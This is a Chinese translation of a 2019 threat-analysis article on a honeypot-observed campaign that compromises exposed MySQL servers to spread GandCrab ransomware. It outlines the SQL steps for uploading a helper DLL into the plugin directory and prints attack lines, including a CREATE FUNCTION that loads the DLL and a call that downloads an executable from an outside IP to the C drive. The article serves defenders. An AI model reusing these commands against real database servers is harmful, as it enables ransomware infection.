攻击MySQL服务器传播GandCrab勒索软件

ang010ela 勒索软件 2019年5月28日发布
Favorite收藏

导语:​研究人员发现有攻击者攻击联网Windows数据库服务器来传播GandCrab勒索软件。

研究人员在实验室环境中搭建了一个蜜罐系统,监听着SQL服务器使用的默认端口(TCP/3306端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该Linux蜜罐下载了一个Windows可执行文件。

攻击者首先用SQL数据库命令在上传helper DLL到服务器,然后作为数据库函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab payload。

数据库服务器下载GandCrab

SQL攻击

攻击的第一阶段是攻击者连接到数据库服务器,然后确定他运行的是MySQL。因为蜜罐系统模拟了MySQL,因此攻击的后面部分就非常顺利。

攻击者释放的SQL命令

然后,攻击者使用set命令来上传所有的字节,这些字节组成了helper DLL,这些字节是长字符串格式的十六进制字符,在内存中会作为变量。

helper DLL作为输出进入数据库,就像真的长记录一样

然后攻击者将变量的内容写入创建的数据库表yongger2中。

然后攻击者发布命令给服务器将这些字节拼接成一个文件,然后释放到服务器的插件目录中。研究人员还发现许多用于交换斜杠和反斜杠字符的命令,目的是绕过安全特征。

Helper DLL的内部功能

DLL看似会向数据库增加3个函数,分别是xpdl3, xpdl3_deinit, xpdl3_init。DLL只是许多恶意工具箱的一个组件,之前就被上传到VirusTotal这样的平台上。

helper DLL包含在许多含有恶意工具集的文档中

攻击者会发布SQL命令来释放yongger2 table,删除通过服务器的文件轨迹记录,释放函数xpdl3。最后,使用下面的SQL命令来创建新的数据库函数xpdl3来调用该DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

将helper DLL传到数据库服务器的插件目录并初始化后,攻击者就会发布SQL命令道服务器中,调用新添加的xpdl3函数:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Wireshark中发现的网络事件序列

如果一切正常,数据库服务器就会从远程机器下载GandCrab payload,并释放到C盘根目录,命名为isetup.exe并执行。

这种攻击很流行

针对数据库服务器的攻击并不少见,而且这个趋势未来可能会继续。就在5月19日这个攻击就发生在真实的MySQL服务器上,机器应该已经被加密。

开放目录使用HFS,含有中文用户接口

但是文件所在的URL指向的是位于web服务器的开放目录,web服务器运行的是HFS服务器软件,这是一个基于Windows的web服务器。

但保存GandCrab样本的机器的IP地址的位置为美国的亚利桑那州,但机器安装的HFS用户接口是简体中文。而且显示有人多次下载了服务器上的文件。

开放目录显示有5个以3306开头的Windows可执行文件,之后是连字符-,实际上是同一文件的多个重命名版本。只有3306.exe文件与其余的不同。目录中还含有名为RDP的恶意Linux ELF可执行文件,但是本次攻击活动中没有使用。

RDP文件是相关的DDOS Linux木马的样本之一

服务器显示样本3306-1.exe的下载量超过500次。所有样本加起来5天下载了接近800,开放目录中的GandCrab样本下载量超过2300次。

虽然目前还没有大规模攻击和广泛传播,但是确实对MySQL服务器管理员带来了巨大的威胁,因为3306端口会成为攻击者的一个跳板。

本文翻译自:https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/如若转载,请注明原文地址: https://www.4hou.com/typ/18226.html
点赞 4
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论